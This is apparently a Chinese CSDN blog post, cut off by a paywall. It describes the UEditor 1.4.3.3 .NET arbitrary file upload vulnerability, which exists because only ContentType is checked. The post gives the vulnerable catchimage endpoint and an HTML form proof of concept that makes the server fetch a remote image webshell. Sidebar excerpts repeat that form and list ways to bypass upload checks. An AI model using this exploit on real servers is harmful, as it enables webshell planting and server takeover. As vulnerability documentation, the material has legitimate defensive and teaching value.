实战 UEditor 任意文件上传漏洞

最新推荐文章于 2024-04-22 23:56:52 发布

Sweelg

最新推荐文章于 2024-04-22 23:56:52 发布

阅读量1.7k

点赞数

分类专栏：各种渗透文章标签：安全 web安全

本文链接：https://blog.csdn.net/x_sweelg/article/details/126764361

版权

本文详细介绍了UEditor .NET版本的一个安全漏洞，该漏洞允许任意文件上传。漏洞利用主要由于只检查了ContentType，攻击者可以通过特定方式上传图片马，然后通过web服务下载。测试表明，只有png类型的图片马能够成功上传，而jpg则无法上传。利用此漏洞，攻击者可以进一步控制服务器。

摘要由CSDN通过智能技术生成

漏洞介绍

该漏洞影响UEditor的.Net版本，其它语言版本暂时未受影响影响版本 1.4.3.3 .NET

漏洞原理

获取图片资源时仅检查了ContentType，导致可以绕过达到任意文件上传

漏洞实战

通过目录扫描到站点下存在ueditor编辑器

通过访问指定路径的返回判断存在漏洞

http://xxx/ueditor/net/controller.ashx?action=catchimage

poc为如下把xxx更换为目标站点即可

<form action="http://xxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sweelg

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

UEditor编辑器任意文件上传漏洞分析

CanMeng'Blog - 一个WEB安全渗透的技术爱好者

12-03

1887

ue下载地址http://http://ueditor.baidu.com/website/download.html exp <form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="sour

【ueditor】任意文件上传漏洞与解决方案

热门推荐

qq_50854662的博客

10-27

2万+

UEditor于近日被曝出高危漏洞，包括目前官方UEditor 1.4.3.3 最新版本，都受到此漏洞的影响，ueditor是百度官方技术团队开发的一套前端编辑器，可以上传图片，写文字，支持自定义的html编写，移动端以及电脑端都可以无缝对接，自适应页面，图片也可以自动适应当前的上传路径与页面比例大小，一些视频文件的上传，开源，高效，稳定，安全，一直深受站长们的喜欢。百度的UEditor文......

实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞（老洞新谈）

zkaqlaoniao的博客

04-12

1万+

前段时间在做某政府单位的项目的时候发现存在该漏洞，虽然是一个老洞，但这也是容易被忽视，且能快速拿到shell的漏洞，在利用方式上有一些不一样的心得，希望能帮助到一些还不太了解的小伙伴，故此写了此篇文章。Ueditor是百度开发的一个网站编辑器，目前已经不对其进行后续开发和更新，该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响，.net存在任意文件上传，绕过文件格式的限制，在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。

Ueditor编辑器任意文件上传漏洞

m0_51468027的博客

07-30

1万+

一文学习Ueditor编辑器任意文件上传漏洞（部署环境到漏洞复现）

UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现

Boom！脑洞大爆炸的博客

07-07

7094

UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现

【合天网安】FCKeditor 2.4.3文件上传漏洞

hehigoxqc606的博客

09-01

1007

【合天网安实验室】FCKeditor 2.4.3文件上传漏洞编辑器漏洞常见的文本编辑器有FCKeditor、Ewebeditor、UEditor、KindEditor、XHeditor等，它们包含的功能类似，如图片上传、视频上传、远程下载等。使用这类编辑器减少了程序开发的时间，但也存在通用性漏洞带来的危害。漏洞介绍 FCKeditor/fckeditor/editor/filemanager/upload/php/upload.php文件上传漏洞。漏洞修复：...

[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP（文件上传漏洞、冰蝎蚁剑、反序列化phar）

杨秀璋的专栏

05-30

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了WHUCTF部分题目，包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路，详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF，还是学到了很多东西，后面几天忙于其他事情，就没再参加。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢网安学院，感谢这些大佬和师傅们（尤其出题和解题的老师们）~

网站漏洞挖掘思路

bluemoon_0的博客

03-13

503

网站漏洞挖掘思路

2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享！

记录开发和安全学习过程中的点点滴滴

04-22

1922

也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.

ueditor 文件上传漏洞_ueditor编辑器上传漏洞

weixin_29476767的博客

02-22

750

摘要：　　UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器，具有轻量、可定制、用户体验优秀等特点。开源基于BSD协议，所有源代码在协议允许范围...UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器，具有轻量、可定制、用户体验优秀等特点。开源基于BSD协议，所有源代码在协议允许范围内可自由修改和使用。百度UEditor的推出，可以帮助不少网站开发者在开...

技术分享|ueditor漏洞利用&源码分析超详细分析

baidu_38876334的博客

04-02

5152

ueditor的漏洞主要存在于其上传功能中，攻击者可以利用上传漏洞将恶意脚本上传到服务器，从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能，并且包含了一些安全检测的代码。其中，一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。

ueditor 文件上传漏洞_UEditor .Net版本任意文件上传漏洞

weixin_30095343的博客

02-22

585

报告编号： B6-2018-082202报告来源： 360CERT报告作者： 360CERT更新日期： 2018-08-220x00 漏洞背景UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器，具有轻量，可定制，注重用户体验等特点，开源基于MIT协议，允许自由使用和修改代码。0x01 漏洞影响该漏洞影响UEditor的.Net版本，其它语言版本暂时未受影响。0x02 ...

UEditor编辑器两个版本任意文件上传漏洞分析

weixin_34009794的博客

12-30

1035

0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器，具有轻量、可定制、用户体验优秀等特点，被广大WEB应用程序所使用；本次爆出的高危漏洞属于.NET版本，其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞，黑客利用此漏洞可以在服务器上执行任意指令，综合评级高危。由于时间仓促，本文分析不到位的地方还请多多谅解。 ...

ueditor php文件上传漏洞

06-06

UEditor的PHP版本的文件上传漏洞主要是由于后台没有进行严格的文件类型、大小和内容的检测，攻击者可以通过修改上传文件的文件名和后缀来绕过检测，上传恶意文件，从而在服务器上执行任意代码。攻击者可以通过以下方式来利用文件上传漏洞： 1. 修改文件名和后缀：攻击者可以将恶意文件的文件名和后缀修改为常见的图片、文档或者压缩文件的后缀名，来绕过后台的文件类型检测。比如将恶意文件的文件名修改为“test.jpg”，就可以上传一个恶意的PHP文件，并且绕过后台的检测。 2. 绕过文件大小限制：攻击者可以通过改变文件上传请求中的Content-Length值，来绕过后台的文件大小限制。比如，攻击者可以使用Burp Suite等工具，修改Content-Length值，将一个超过限制大小的文件上传到服务器。为了防止文件上传漏洞的利用，应该对上传的文件进行严格的文件类型、大小和内容的检测。具体措施可以包括： 1. 对上传文件的后缀名进行白名单过滤，只允许上传指定的文件类型。 2. 对上传文件的大小进行限制，限制上传文件的大小不能超过最大限制值。 3. 对上传文件的内容进行检测，防止上传恶意文件。 4. 对上传目录进行安全设置，禁止直接访问上传目录下的文件。 5. 定期清理上传目录，删除不必要的文件。总之，为了保障网站的安全性，必须加强文件上传的安全控制，防止恶意文件的上传和执行。